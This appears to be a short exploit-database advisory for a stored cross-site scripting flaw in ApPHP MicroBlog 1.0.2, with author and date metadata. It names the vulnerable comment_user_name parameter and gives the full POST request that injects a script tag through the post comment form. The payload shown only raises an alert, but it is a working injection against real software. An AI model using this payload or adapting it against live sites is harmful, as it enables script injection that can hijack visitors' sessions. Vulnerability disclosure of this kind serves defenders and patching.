# Exploit Title :              ApPHP MicroBlog 1.0.2  - Stored Cross
Site Scripting
# Author :                      Besim
# Google Dork :
# Date :                         12/10/2016
# Type :                         webapps
# Platform :                    PHP
# Vendor Homepage :   -
# Software link :            http://www.scriptdungeon.com/jump.php?ScriptID=9162
 
Description : 
 
Vulnerable link : http://site_name/path/index.php?page=posts&post_id=
 
Stored XSS Payload ( Comments ): *
 
# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
 
############  POST DATA ############
 
task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment
 
############ ######################